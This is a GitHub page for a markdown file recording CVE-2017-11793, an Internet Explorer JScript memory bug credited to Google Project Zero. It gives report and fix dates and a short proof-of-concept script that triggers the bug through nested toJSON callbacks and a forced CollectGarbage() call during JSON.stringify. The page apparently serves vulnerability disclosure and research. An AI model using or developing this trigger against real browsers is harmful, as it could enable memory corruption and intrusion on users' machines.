Skip to content

Latest commit

 

History

History
31 lines (22 loc) · 528 Bytes

CVE-2017-11793.md

File metadata and controls

31 lines (22 loc) · 528 Bytes
Raw

CVE-2017-11793

  • Report: Oct 2017
  • Fix: Dec 2017
  • Credit: ifratric of Google Project Zero

PoC

<script language="Jscript.Encode">

var o1 = {toJSON:function(){
  alert('o1');
  return [o2];
}}

var o2 = {toJSON:function(){
  alert('o2');
  CollectGarbage();
  return 'x';
}}

JSON.stringify(o1);

</script>

Reference